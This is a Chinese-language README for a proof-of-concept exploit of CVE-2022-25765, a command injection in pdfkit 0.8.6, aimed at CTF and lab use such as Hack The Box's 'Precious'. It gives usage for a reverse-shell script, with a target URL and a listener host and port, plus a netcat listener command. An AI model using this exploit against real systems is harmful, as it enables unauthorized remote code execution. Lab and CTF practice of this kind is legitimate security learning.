CVE-2022-25765 的 PoC,影响存在漏洞的 pdfkit 版本。
已在 pdfkit 0.8.6 上测试。
requestscolorama安装依赖:
pip3 install -r requirements.txt
或手动安装:
pip3 install requests colorama
python3 exploit2.py -u <TARGET> -l <LHOST> -p <LPORT>
示例: 启动监听器
nc -lvnp 4242
python3 exploit2.py -u http://10.10.10.10 -l 10.10.14.5 -p 4444
克隆仓库:
git clone [email protected]:innocentx0/CVE-2022-25765.git
cd CVE-2022-25765
安装依赖:
pip3 install -r requirements.txt
在你的实验环境中运行 PoC。
CVE-2022-25765 是存在漏洞的 pdfkit 版本中的一个命令注入漏洞。
该问题与传递给 PDF 生成过程的用户可控输入缺乏充分过滤有关。
此 PoC 主要用于学习以及 CTF/实验环境。
如果你想找一个地方进行尝试,Hack The Box:机器:Precious。
仅可对你自己拥有或已获得明确测试许可的系统使用此工具。
对于因本项目造成的滥用或损害,我不承担任何责任。
INNOCENTx0